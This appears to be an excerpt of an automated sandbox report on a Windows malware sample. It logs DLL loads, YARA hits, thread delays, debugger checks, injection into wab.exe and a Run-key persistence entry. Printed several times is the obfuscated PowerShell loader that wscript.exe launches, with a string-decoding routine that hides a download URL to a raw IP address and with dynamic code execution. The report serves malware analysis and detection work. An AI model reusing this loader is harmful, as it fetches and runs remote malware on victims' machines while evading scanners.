              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("PowerShell "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmob", "Unsupported parameter type 00000000")
              Source: Yara match File source: 00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Componental)$global:Nondilatable = [System.Text.Encoding]::ASCII.GetString($Oversensible)$global:Dactylonomy204=$Nondilatable.substring(280456,27225)<#Disciflorous Ulmous Kongstanke
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Deckets $Cads173 $Ansatses), (Romanbladsstilen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:ungrowing = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lossepladsernes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Computerforhandlerens, $false).DefineType
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Componental)$global:Nondilatable = [System.Text.Encoding]::ASCII.GetString($Oversensible)$global:Dactylonomy204=$Nondilatable.substring(280456,27225)<#Disciflorous Ulmous Kongstanke
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (command line identical to the one in the previous entry)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B0A25 push esi; retf 5_2_046B0A2A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B0A19 push esi; retf 5_2_046B0A1A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B11B5 pushad ; retf 5_2_046B1199
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B118B pushad ; retf 5_2_046B1199
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B119B pushfd ; retf 5_2_046B11A9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B33F5 push esp; retf 5_2_046B33D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046B33C5 push esp; retf 5_2_046B33D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_049008C2 push eax; mov dword ptr [esp], ecx 5_2_04900AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08DF4DCF push cs; retf 5_2_08DF4DD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08DF05C7 push cs; ret 5_2_08DF05E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08DF1193 push ecx; iretd 5_2_08DF1195
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_046605C7 push cs; ret 10_2_046605E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04664DCF push cs; retf 10_2_04664DD0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04661193 push ecx; iretd 10_2_04661195
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4668
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5224
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7902
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1843
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3489
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5461
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1759
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1112 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892 Thread sleep count: 7902 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892 Thread sleep count: 1843 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4828 Thread sleep count: 3489 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632 Thread sleep count: 100 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632 Thread sleep time: -300000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632 Thread sleep count: 5461 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632 Thread sleep time: -16383000s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3489 delay: -5
              Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2661868047.0000023D7285E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWCh%SystemRoot%\system32\mswsock.dllhelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4660000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: E5FE74
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
